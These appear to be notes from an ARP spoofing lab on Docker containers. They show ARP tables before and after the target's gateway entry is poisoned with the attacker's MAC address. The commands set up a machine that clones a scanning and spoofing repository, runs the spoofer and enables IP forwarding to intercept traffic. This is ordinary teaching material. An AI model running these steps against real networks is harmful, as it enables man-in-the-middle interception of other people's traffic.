Attacker
? (172.17.0.2) at 02:42:ac:11:00:02 [ether] on eth0
? (172.17.0.1) at 02:42:82:9f:b7:92 [ether] on eth0

target
? (172.17.0.3) at 02:42:ac:11:00:03 [ether] on eth0
? (172.17.0.1) at 02:42:82:9f:b7:92 [ether] on eth0

------------------------------------------------
attacker
? (172.17.0.2) at 02:42:ac:11:00:02 [ether] on eth0
? (172.17.0.1) at 02:42:82:9f:b7:92 [ether] on eth0

target
? (172.17.0.3) at 02:42:ac:11:00:03 [ether] on eth0
? (172.17.0.1) at 02:42:ac:11:00:03 [ether] on eth0


echo 1 > /proc/sys/net/ipv4/ip_forward


-------------------------------------------------

docker network connect lab-network ubuntu-linux-2


Commands on hacking machine
apt update -y
apt install vim python-is-python3 python3-pip iputils-ping net-tools nano -y
apt install git -y
pip install scapy
git clone https://github.com/Rajesh1308/pyHack-project.git
cd pyHack-project/Network_scanner/
python scanner.py -t 172.17.0.1/24
cd pyHack-project/ARP_Spoofing/
python spoofer.py
echo 1 > /proc/sys/net/ipv4/ip_forward
(optional)git pull origin main #updates the repo

Commands on target machine
apt update
apt install iputils-ping net-tools -y
